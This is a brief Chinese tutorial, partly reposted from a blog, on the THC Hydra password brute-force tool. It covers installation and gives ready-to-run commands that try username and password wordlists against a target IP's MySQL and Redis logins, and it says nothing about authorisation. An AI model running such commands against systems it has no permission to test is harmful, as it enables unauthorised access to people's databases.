安装:
windows:直接取github下载https://github.com/maaaaz/thc-hydra-windows
linux:kali自带爆破工具,属于主流爆破工具
windows上下载完成后解压,然后再当前目录下打开cmd,输入hydra -h可以查看常用的命令
其中红色框内的两条指令最常用,L后面是账号集,P后面是密码集,注意大小写,大写代表文件。如果账号集中有m个账号,密码集中有n个密码,那么Hydra就会尝试m×n次爆破。
下面以mysql为例,写一条爆破指令,假如C:\Users\cjx路径下有账号集文件username.txt,有密码集文件password.txt,那么对某IP的mysql服务进行爆破的命令就可以这么写(C:\Users\cjx路径下打开命令行):
hydra -L username.txt -P password.txt mysql://目标IP:mysql端口号
如果服务使用的是默认端口,那么指令也可以这么写:
hydra -L username.txt -P password.txt 目标IP mysql
如果需要将爆破的过程打印出来就加个指令-v
hydra -L username.txt -P password.txt -v mysql://目标IP:mysql端口号
注意事项
有的服务并没有账号,只需要输入密码,例如Redis,那么指令中就不需要账号文件,指令就这么写:
hydra -P password.txt redis://目标IP:redis端口号
部分转载自:https://blog.csdn.net/cjx529377/article/details/85418802